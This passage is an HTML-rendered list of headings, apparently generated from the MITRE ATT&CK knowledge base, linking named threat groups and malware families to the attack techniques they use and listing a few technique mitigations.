<h3 id="_axiom_g0001_uses_credential_dumping_t1003"><a class="anchor" href="#_axiom_g0001_uses_credential_dumping_t1003"></a><a class="link" href="#_axiom_g0001_uses_credential_dumping_t1003">Axiom (G0001) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_helminth_s0170_uses_command_line_interface_t1059"><a class="anchor" href="#_helminth_s0170_uses_command_line_interface_t1059"></a><a class="link" href="#_helminth_s0170_uses_command_line_interface_t1059">Helminth (S0170) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_sakula_s0074_uses_dll_side_loading_t1073"><a class="anchor" href="#_sakula_s0074_uses_dll_side_loading_t1073"></a><a class="link" href="#_sakula_s0074_uses_dll_side_loading_t1073">Sakula (S0074) uses DLL Side-Loading (T1073)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_apt3_g0022_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_apt3_g0022_uses_system_owner_user_discovery_t1033">APT3 (G0022) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_httpbrowser_s0070_uses_command_line_interface_t1059"><a class="anchor" href="#_httpbrowser_s0070_uses_command_line_interface_t1059"></a><a class="link" href="#_httpbrowser_s0070_uses_command_line_interface_t1059">HTTPBrowser (S0070) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_pass_the_hash_toolkit_s0122_uses_pass_the_hash_t1075"><a class="anchor" href="#_pass_the_hash_toolkit_s0122_uses_pass_the_hash_t1075"></a><a class="link" href="#_pass_the_hash_toolkit_s0122_uses_pass_the_hash_t1075">Pass-The-Hash Toolkit (S0122) uses Pass the Hash (T1075)</a></h3>
</div>
<div class="sect2">
<h3 id="_sowbug_g0054_uses_masquerading_t1036"><a class="anchor" href="#_sowbug_g0054_uses_masquerading_t1036"></a><a class="link" href="#_sowbug_g0054_uses_masquerading_t1036">Sowbug (G0054) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_gazer_s0168_uses_shortcut_modification_t1023"><a class="anchor" href="#_gazer_s0168_uses_shortcut_modification_t1023"></a><a class="link" href="#_gazer_s0168_uses_shortcut_modification_t1023">Gazer (S0168) uses Shortcut Modification (T1023)</a></h3>
</div>
<div class="sect2">
<h3 id="_pwdump_s0006_uses_credential_dumping_t1003"><a class="anchor" href="#_pwdump_s0006_uses_credential_dumping_t1003"></a><a class="link" href="#_pwdump_s0006_uses_credential_dumping_t1003">pwdump (S0006) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt32_g0050_uses_file_deletion_t1107"><a class="anchor" href="#_apt32_g0050_uses_file_deletion_t1107"></a><a class="link" href="#_apt32_g0050_uses_file_deletion_t1107">APT32 (G0050) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_valid_accounts_t1078"><a class="anchor" href="#_menupass_g0045_uses_valid_accounts_t1078"></a><a class="link" href="#_menupass_g0045_uses_valid_accounts_t1078">menuPass (G0045) uses Valid Accounts (T1078)</a></h3>
</div>
<div class="sect2">
<h3 id="_source_mitigation_t1153_mitigates_source_t1153"><a class="anchor" href="#_source_mitigation_t1153_mitigates_source_t1153"></a><a class="link" href="#_source_mitigation_t1153_mitigates_source_t1153">Source Mitigation (T1153) mitigates Source (T1153)</a></h3>
</div>
<div class="sect2">
<h3 id="_ke3chang_g0004_uses_command_line_interface_t1059"><a class="anchor" href="#_ke3chang_g0004_uses_command_line_interface_t1059"></a><a class="link" href="#_ke3chang_g0004_uses_command_line_interface_t1059">Ke3chang (G0004) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_1314_g0028_uses_valid_accounts_t1078"><a class="anchor" href="#_threat_group_1314_g0028_uses_valid_accounts_t1078"></a><a class="link" href="#_threat_group_1314_g0028_uses_valid_accounts_t1078">Threat Group-1314 (G0028) uses Valid Accounts (T1078)</a></h3>
</div>
<div class="sect2">
<h3 id="_htran_s0040_uses_connection_proxy_t1090"><a class="anchor" href="#_htran_s0040_uses_connection_proxy_t1090"></a><a class="link" href="#_htran_s0040_uses_connection_proxy_t1090">HTRAN (S0040) uses Connection Proxy (T1090)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin6_g0037_uses_psexec_s0029"><a class="anchor" href="#_fin6_g0037_uses_psexec_s0029"></a><a class="link" href="#_fin6_g0037_uses_psexec_s0029">FIN6 (G0037) uses PsExec (S0029)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_windows_management_instrumentation_t1047"><a class="anchor" href="#_menupass_g0045_uses_windows_management_instrumentation_t1047"></a><a class="link" href="#_menupass_g0045_uses_windows_management_instrumentation_t1047">menuPass (G0045) uses Windows Management Instrumentation (T1047)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_powershell_t1086"><a class="anchor" href="#_bronze_butler_g0060_uses_powershell_t1086"></a><a class="link" href="#_bronze_butler_g0060_uses_powershell_t1086">BRONZE BUTLER (G0060) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_plugx_s0013_uses_trusted_developer_utilities_t1127"><a class="anchor" href="#_plugx_s0013_uses_trusted_developer_utilities_t1127"></a><a class="link" href="#_plugx_s0013_uses_trusted_developer_utilities_t1127">PlugX (S0013) uses Trusted Developer Utilities (T1127)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_credential_dumping_t1003"><a class="anchor" href="#_cobalt_strike_s0154_uses_credential_dumping_t1003"></a><a class="link" href="#_cobalt_strike_s0154_uses_credential_dumping_t1003">Cobalt Strike (S0154) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_process_injection_t1055"><a class="anchor" href="#_cobalt_strike_s0154_uses_process_injection_t1055"></a><a class="link" href="#_cobalt_strike_s0154_uses_process_injection_t1055">Cobalt Strike (S0154) uses Process Injection (T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_powruner_s0184_uses_command_line_interface_t1059"><a class="anchor" href="#_powruner_s0184_uses_command_line_interface_t1059"></a><a class="link" href="#_powruner_s0184_uses_command_line_interface_t1059">POWRUNER (S0184) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_windows_admin_shares_t1077"><a class="anchor" href="#_lazarus_group_g0032_uses_windows_admin_shares_t1077"></a><a class="link" href="#_lazarus_group_g0032_uses_windows_admin_shares_t1077">Lazarus Group (G0032) uses Windows Admin Shares (T1077)</a></h3>
</div>
<div class="sect2">
<h3 id="_setuid_and_setgid_mitigation_t1166_mitigates_setuid_and_setgid_t1166"><a class="anchor" href="#_setuid_and_setgid_mitigation_t1166_mitigates_setuid_and_setgid_t1166"></a><a class="link" href="#_setuid_and_setgid_mitigation_t1166_mitigates_setuid_and_setgid_t1166">Setuid and Setgid Mitigation (T1166) mitigates Setuid and Setgid (T1166)</a></h3>
</div>
<div class="sect2">
<h3 id="_flashflood_s0036_uses_data_from_removable_media_t1025"><a class="anchor" href="#_flashflood_s0036_uses_data_from_removable_media_t1025"></a><a class="link" href="#_flashflood_s0036_uses_data_from_removable_media_t1025">FLASHFLOOD (S0036) uses Data from Removable Media (T1025)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt32_g0050_uses_phoreal_s0158"><a class="anchor" href="#_apt32_g0050_uses_phoreal_s0158"></a><a class="link" href="#_apt32_g0050_uses_phoreal_s0158">APT32 (G0050) uses PHOREAL (S0158)</a></h3>
</div>
<div class="sect2">
<h3 id="_zlib_s0086_uses_command_line_interface_t1059"><a class="anchor" href="#_zlib_s0086_uses_command_line_interface_t1059"></a><a class="link" href="#_zlib_s0086_uses_command_line_interface_t1059">ZLib (S0086) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_equation_g0020_uses_peripheral_device_discovery_t1120"><a class="anchor" href="#_equation_g0020_uses_peripheral_device_discovery_t1120"></a><a class="link" href="#_equation_g0020_uses_peripheral_device_discovery_t1120">Equation (G0020) uses Peripheral Device Discovery (T1120)</a></h3>
</div>
<div class="sect2">
<h3 id="_downpaper_s0186_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_downpaper_s0186_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_downpaper_s0186_uses_system_owner_user_discovery_t1033">DownPaper (S0186) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_cloudduke_s0054_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_cloudduke_s0054_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_cloudduke_s0054_uses_standard_application_layer_protocol_t1071">CloudDuke (S0054) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_responder_s0174_uses_network_sniffing_t1040"><a class="anchor" href="#_responder_s0174_uses_network_sniffing_t1040"></a><a class="link" href="#_responder_s0174_uses_network_sniffing_t1040">Responder (S0174) uses Network Sniffing (T1040)</a></h3>
</div>
<div class="sect2">
<h3 id="_usbstealer_s0136_uses_exfiltration_over_physical_medium_t1052"><a class="anchor" href="#_usbstealer_s0136_uses_exfiltration_over_physical_medium_t1052"></a><a class="link" href="#_usbstealer_s0136_uses_exfiltration_over_physical_medium_t1052">USBStealer (S0136) uses Exfiltration Over Physical Medium (T1052)</a></h3>
</div>
<div class="sect2">
<h3 id="_pteranodon_s0147_uses_file_deletion_t1107"><a class="anchor" href="#_pteranodon_s0147_uses_file_deletion_t1107"></a><a class="link" href="#_pteranodon_s0147_uses_file_deletion_t1107">Pteranodon (S0147) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_hcdloader_s0071_uses_new_service_t1050"><a class="anchor" href="#_hcdloader_s0071_uses_new_service_t1050"></a><a class="link" href="#_hcdloader_s0071_uses_new_service_t1050">hcdLoader (S0071) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_pteranodon_s0147_uses_exfiltration_over_command_and_control_channel_t1041"><a class="anchor" href="#_pteranodon_s0147_uses_exfiltration_over_command_and_control_channel_t1041"></a><a class="link" href="#_pteranodon_s0147_uses_exfiltration_over_command_and_control_channel_t1041">Pteranodon (S0147) uses Exfiltration Over Command and Control Channel (T1041)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_lazarus_group_g0032_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_lazarus_group_g0032_uses_system_owner_user_discovery_t1033">Lazarus Group (G0032) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_credentials_in_files_t1081"><a class="anchor" href="#_blackenergy_s0089_uses_credentials_in_files_t1081"></a><a class="link" href="#_blackenergy_s0089_uses_credentials_in_files_t1081">BlackEnergy (S0089) uses Credentials in Files (T1081)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_remote_file_copy_t1105"><a class="anchor" href="#_threat_group_3390_g0027_uses_remote_file_copy_t1105"></a><a class="link" href="#_threat_group_3390_g0027_uses_remote_file_copy_t1105">Threat Group-3390 (G0027) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_httpbrowser_s0070_uses_masquerading_t1036"><a class="anchor" href="#_httpbrowser_s0070_uses_masquerading_t1036"></a><a class="link" href="#_httpbrowser_s0070_uses_masquerading_t1036">HTTPBrowser (S0070) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_cozycar_s0046_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_cozycar_s0046_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_cozycar_s0046_uses_standard_application_layer_protocol_t1071">CozyCar (S0046) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_derusbi_s0021_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_derusbi_s0021_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_derusbi_s0021_uses_system_owner_user_discovery_t1033">Derusbi (S0021) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_hidedrv_s0135"><a class="anchor" href="#_apt28_g0007_uses_hidedrv_s0135"></a><a class="link" href="#_apt28_g0007_uses_hidedrv_s0135">APT28 (G0007) uses HIDEDRV (S0135)</a></h3>
</div>
<div class="sect2">
<h3 id="_powersource_s0145_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_powersource_s0145_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_powersource_s0145_uses_obfuscated_files_or_information_t1027">POWERSOURCE (S0145) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_rover_s0090_uses_data_from_removable_media_t1025"><a class="anchor" href="#_rover_s0090_uses_data_from_removable_media_t1025"></a><a class="link" href="#_rover_s0090_uses_data_from_removable_media_t1025">Rover (S0090) uses Data from Removable Media (T1025)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_exfiltration_over_alternative_protocol_t1048"><a class="anchor" href="#_lazarus_group_g0032_uses_exfiltration_over_alternative_protocol_t1048"></a><a class="link" href="#_lazarus_group_g0032_uses_exfiltration_over_alternative_protocol_t1048">Lazarus Group (G0032) uses Exfiltration Over Alternative Protocol (T1048)</a></h3>
</div>
<div class="sect2">
<h3 id="_carbanak_s0030_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_carbanak_s0030_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_carbanak_s0030_uses_standard_cryptographic_protocol_t1032">Carbanak (S0030) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_poisonivy_s0012_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_poisonivy_s0012_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_poisonivy_s0012_uses_standard_cryptographic_protocol_t1032">PoisonIvy (S0012) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_seaduke_s0053_uses_email_collection_t1114"><a class="anchor" href="#_seaduke_s0053_uses_email_collection_t1114"></a><a class="link" href="#_seaduke_s0053_uses_email_collection_t1114">SeaDuke (S0053) uses Email Collection (T1114)</a></h3>
</div>
<div class="sect2">
<h3 id="_chches_s0144_uses_process_discovery_t1057"><a class="anchor" href="#_chches_s0144_uses_process_discovery_t1057"></a><a class="link" href="#_chches_s0144_uses_process_discovery_t1057">ChChes (S0144) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt32_g0050_uses_custom_command_and_control_protocol_t1094"><a class="anchor" href="#_apt32_g0050_uses_custom_command_and_control_protocol_t1094"></a><a class="link" href="#_apt32_g0050_uses_custom_command_and_control_protocol_t1094">APT32 (G0050) uses Custom Command and Control Protocol (T1094)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_prikormka_s0113_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_prikormka_s0113_uses_obfuscated_files_or_information_t1027">Prikormka (S0113) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_reg_s0075"><a class="anchor" href="#_oilrig_g0049_uses_reg_s0075"></a><a class="link" href="#_oilrig_g0049_uses_reg_s0075">OilRig (G0049) uses Reg (S0075)</a></h3>
</div>
<div class="sect2">
<h3 id="_xagentosx_s0161_uses_file_deletion_t1107"><a class="anchor" href="#_xagentosx_s0161_uses_file_deletion_t1107"></a><a class="link" href="#_xagentosx_s0161_uses_file_deletion_t1107">XAgentOSX (S0161) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_httpbrowser_s0070_uses_input_capture_t1056"><a class="anchor" href="#_httpbrowser_s0070_uses_input_capture_t1056"></a><a class="link" href="#_httpbrowser_s0070_uses_input_capture_t1056">HTTPBrowser (S0070) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_cosmicduke_s0050_uses_data_from_local_system_t1005"><a class="anchor" href="#_cosmicduke_s0050_uses_data_from_local_system_t1005"></a><a class="link" href="#_cosmicduke_s0050_uses_data_from_local_system_t1005">CosmicDuke (S0050) uses Data from Local System (T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_file_deletion_t1107"><a class="anchor" href="#_remsec_s0125_uses_file_deletion_t1107"></a><a class="link" href="#_remsec_s0125_uses_file_deletion_t1107">Remsec (S0125) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_hi_zor_s0087_uses_command_line_interface_t1059"><a class="anchor" href="#_hi_zor_s0087_uses_command_line_interface_t1059"></a><a class="link" href="#_hi_zor_s0087_uses_command_line_interface_t1059">Hi-Zor (S0087) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_ke3chang_g0004_uses_data_compressed_t1002"><a class="anchor" href="#_ke3chang_g0004_uses_data_compressed_t1002"></a><a class="link" href="#_ke3chang_g0004_uses_data_compressed_t1002">Ke3chang (G0004) uses Data Compressed (T1002)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_permission_groups_discovery_t1069"><a class="anchor" href="#_oilrig_g0049_uses_permission_groups_discovery_t1069"></a><a class="link" href="#_oilrig_g0049_uses_permission_groups_discovery_t1069">OilRig (G0049) uses Permission Groups Discovery (T1069)</a></h3>
</div>
<div class="sect2">
<h3 id="_copykittens_g0052_uses_tdtess_s0164"><a class="anchor" href="#_copykittens_g0052_uses_tdtess_s0164"></a><a class="link" href="#_copykittens_g0052_uses_tdtess_s0164">CopyKittens (G0052) uses TDTESS (S0164)</a></h3>
</div>
<div class="sect2">
<h3 id="_power_loader_s0177_uses_extra_window_memory_injection_t1181"><a class="anchor" href="#_power_loader_s0177_uses_extra_window_memory_injection_t1181"></a><a class="link" href="#_power_loader_s0177_uses_extra_window_memory_injection_t1181">Power Loader (S0177) uses Extra Window Memory Injection (T1181)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_commonly_used_port_t1043"><a class="anchor" href="#_lazarus_group_g0032_uses_commonly_used_port_t1043"></a><a class="link" href="#_lazarus_group_g0032_uses_commonly_used_port_t1043">Lazarus Group (G0032) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackcoffee_s0069_uses_multi_stage_channels_t1104"><a class="anchor" href="#_blackcoffee_s0069_uses_multi_stage_channels_t1104"></a><a class="link" href="#_blackcoffee_s0069_uses_multi_stage_channels_t1104">BLACKCOFFEE (S0069) uses Multi-Stage Channels (T1104)</a></h3>
</div>
<div class="sect2">
<h3 id="_suckfly_g0039_uses_code_signing_t1116"><a class="anchor" href="#_suckfly_g0039_uses_code_signing_t1116"></a><a class="link" href="#_suckfly_g0039_uses_code_signing_t1116">Suckfly (G0039) uses Code Signing (T1116)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_component_object_model_hijacking_t1122"><a class="anchor" href="#_apt28_g0007_uses_component_object_model_hijacking_t1122"></a><a class="link" href="#_apt28_g0007_uses_component_object_model_hijacking_t1122">APT28 (G0007) uses Component Object Model Hijacking (T1122)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_system_information_discovery_t1082"><a class="anchor" href="#_oilrig_g0049_uses_system_information_discovery_t1082"></a><a class="link" href="#_oilrig_g0049_uses_system_information_discovery_t1082">OilRig (G0049) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_dust_storm_g0031_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_dust_storm_g0031_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_dust_storm_g0031_uses_file_and_directory_discovery_t1083">Dust Storm (G0031) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_gamaredon_group_g0047_uses_scripting_t1064"><a class="anchor" href="#_gamaredon_group_g0047_uses_scripting_t1064"></a><a class="link" href="#_gamaredon_group_g0047_uses_scripting_t1064">Gamaredon Group (G0047) uses Scripting (T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_osinfo_s0165_uses_remote_system_discovery_t1018"><a class="anchor" href="#_osinfo_s0165_uses_remote_system_discovery_t1018"></a><a class="link" href="#_osinfo_s0165_uses_remote_system_discovery_t1018">OSInfo (S0165) uses Remote System Discovery (T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_daserf_s0187_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_daserf_s0187_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_daserf_s0187_uses_standard_application_layer_protocol_t1071">Daserf (S0187) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_system_network_configuration_discovery_mitigation_t1016_mitigates_system_network_configuration_discovery_t1016"><a class="anchor" href="#_system_network_configuration_discovery_mitigation_t1016_mitigates_system_network_configuration_discovery_t1016"></a><a class="link" href="#_system_network_configuration_discovery_mitigation_t1016_mitigates_system_network_configuration_discovery_t1016">System Network Configuration Discovery Mitigation (T1016) mitigates System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_pngdowner_s0067_uses_credentials_in_files_t1081"><a class="anchor" href="#_pngdowner_s0067_uses_credentials_in_files_t1081"></a><a class="link" href="#_pngdowner_s0067_uses_credentials_in_files_t1081">pngdowner (S0067) uses Credentials in Files (T1081)</a></h3>
</div>
<div class="sect2">
<h3 id="_backspace_s0031_uses_exfiltration_over_command_and_control_channel_t1041"><a class="anchor" href="#_backspace_s0031_uses_exfiltration_over_command_and_control_channel_t1041"></a><a class="link" href="#_backspace_s0031_uses_exfiltration_over_command_and_control_channel_t1041">BACKSPACE (S0031) uses Exfiltration Over Command and Control Channel (T1041)</a></h3>
</div>
<div class="sect2">
<h3 id="_usbstealer_s0136_uses_masquerading_t1036"><a class="anchor" href="#_usbstealer_s0136_uses_masquerading_t1036"></a><a class="link" href="#_usbstealer_s0136_uses_masquerading_t1036">USBStealer (S0136) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_ke3chang_g0004_uses_system_network_connections_discovery_t1049"><a class="anchor" href="#_ke3chang_g0004_uses_system_network_connections_discovery_t1049"></a><a class="link" href="#_ke3chang_g0004_uses_system_network_connections_discovery_t1049">Ke3chang (G0004) uses System Network Connections Discovery (T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_rarstone_s0055_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_rarstone_s0055_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_rarstone_s0055_uses_file_and_directory_discovery_t1083">RARSTONE (S0055) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_misdat_s0083_uses_commonly_used_port_t1043"><a class="anchor" href="#_misdat_s0083_uses_commonly_used_port_t1043"></a><a class="link" href="#_misdat_s0083_uses_commonly_used_port_t1043">Misdat (S0083) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_redleaves_s0153_uses_file_deletion_t1107"><a class="anchor" href="#_redleaves_s0153_uses_file_deletion_t1107"></a><a class="link" href="#_redleaves_s0153_uses_file_deletion_t1107">RedLeaves (S0153) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_gazer_s0168_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_gazer_s0168_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_gazer_s0168_uses_system_owner_user_discovery_t1033">Gazer (S0168) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_query_registry_mitigation_t1012_mitigates_query_registry_t1012"><a class="anchor" href="#_query_registry_mitigation_t1012_mitigates_query_registry_t1012"></a><a class="link" href="#_query_registry_mitigation_t1012_mitigates_query_registry_t1012">Query Registry Mitigation (T1012) mitigates Query Registry (T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_streamex_s0142_uses_process_discovery_t1057"><a class="anchor" href="#_streamex_s0142_uses_process_discovery_t1057"></a><a class="link" href="#_streamex_s0142_uses_process_discovery_t1057">StreamEx (S0142) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_regin_s0019_uses_windows_admin_shares_t1077"><a class="anchor" href="#_regin_s0019_uses_windows_admin_shares_t1077"></a><a class="link" href="#_regin_s0019_uses_windows_admin_shares_t1077">Regin (S0019) uses Windows Admin Shares (T1077)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_disabling_security_tools_t1089"><a class="anchor" href="#_threat_group_3390_g0027_uses_disabling_security_tools_t1089"></a><a class="link" href="#_threat_group_3390_g0027_uses_disabling_security_tools_t1089">Threat Group-3390 (G0027) uses Disabling Security Tools (T1089)</a></h3>
</div>
<div class="sect2">
<h3 id="_cozycar_s0046_uses_new_service_t1050"><a class="anchor" href="#_cozycar_s0046_uses_new_service_t1050"></a><a class="link" href="#_cozycar_s0046_uses_new_service_t1050">CozyCar (S0046) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_naikon_g0019_uses_rarstone_s0055"><a class="anchor" href="#_naikon_g0019_uses_rarstone_s0055"></a><a class="link" href="#_naikon_g0019_uses_rarstone_s0055">Naikon (G0019) uses RARSTONE (S0055)</a></h3>
</div>
<div class="sect2">
<h3 id="_rawpos_s0169_uses_data_staged_t1074"><a class="anchor" href="#_rawpos_s0169_uses_data_staged_t1074"></a><a class="link" href="#_rawpos_s0169_uses_data_staged_t1074">RawPOS (S0169) uses Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_dust_storm_g0031_uses_s_type_s0085"><a class="anchor" href="#_dust_storm_g0031_uses_s_type_s0085"></a><a class="link" href="#_dust_storm_g0031_uses_s_type_s0085">Dust Storm (G0031) uses S-Type (S0085)</a></h3>
</div>
<div class="sect2">
<h3 id="_redleaves_s0153_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_redleaves_s0153_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_redleaves_s0153_uses_obfuscated_files_or_information_t1027">RedLeaves (S0153) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_windows_credential_editor_s0005_uses_credential_dumping_t1003"><a class="anchor" href="#_windows_credential_editor_s0005_uses_credential_dumping_t1003"></a><a class="link" href="#_windows_credential_editor_s0005_uses_credential_dumping_t1003">Windows Credential Editor (S0005) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_glooxmail_s0026_uses_web_service_t1102"><a class="anchor" href="#_glooxmail_s0026_uses_web_service_t1102"></a><a class="link" href="#_glooxmail_s0026_uses_web_service_t1102">GLOOXMAIL (S0026) uses Web Service (T1102)</a></h3>
</div>
<div class="sect2">
<h3 id="_komprogo_s0156_uses_windows_management_instrumentation_t1047"><a class="anchor" href="#_komprogo_s0156_uses_windows_management_instrumentation_t1047"></a><a class="link" href="#_komprogo_s0156_uses_windows_management_instrumentation_t1047">KOMPROGO (S0156) uses Windows Management Instrumentation (T1047)</a></h3>
</div>
<div class="sect2">
<h3 id="_h1n1_s0132_uses_disabling_security_tools_t1089"><a class="anchor" href="#_h1n1_s0132_uses_disabling_security_tools_t1089"></a><a class="link" href="#_h1n1_s0132_uses_disabling_security_tools_t1089">H1N1 (S0132) uses Disabling Security Tools (T1089)</a></h3>
</div>
<div class="sect2">
<h3 id="_ke3chang_g0004_uses_systeminfo_s0096"><a class="anchor" href="#_ke3chang_g0004_uses_systeminfo_s0096"></a><a class="link" href="#_ke3chang_g0004_uses_systeminfo_s0096">Ke3chang (G0004) uses Systeminfo (S0096)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_multiband_communication_t1026"><a class="anchor" href="#_lazarus_group_g0032_uses_multiband_communication_t1026"></a><a class="link" href="#_lazarus_group_g0032_uses_multiband_communication_t1026">Lazarus Group (G0032) uses Multiband Communication (T1026)</a></h3>
</div>
<div class="sect2">
<h3 id="_4h_rat_s0065_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_4h_rat_s0065_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_4h_rat_s0065_uses_custom_cryptographic_protocol_t1024">4H RAT (S0065) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_volgmer_s0180_uses_system_information_discovery_t1082"><a class="anchor" href="#_volgmer_s0180_uses_system_information_discovery_t1082"></a><a class="link" href="#_volgmer_s0180_uses_system_information_discovery_t1082">Volgmer (S0180) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_lotus_blossom_g0030_uses_elise_s0081"><a class="anchor" href="#_lotus_blossom_g0030_uses_elise_s0081"></a><a class="link" href="#_lotus_blossom_g0030_uses_elise_s0081">Lotus Blossom (G0030) uses Elise (S0081)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_standard_non_application_layer_protocol_t1095"><a class="anchor" href="#_remsec_s0125_uses_standard_non_application_layer_protocol_t1095"></a><a class="link" href="#_remsec_s0125_uses_standard_non_application_layer_protocol_t1095">Remsec (S0125) uses Standard Non-Application Layer Protocol (T1095)</a></h3>
</div>
<div class="sect2">
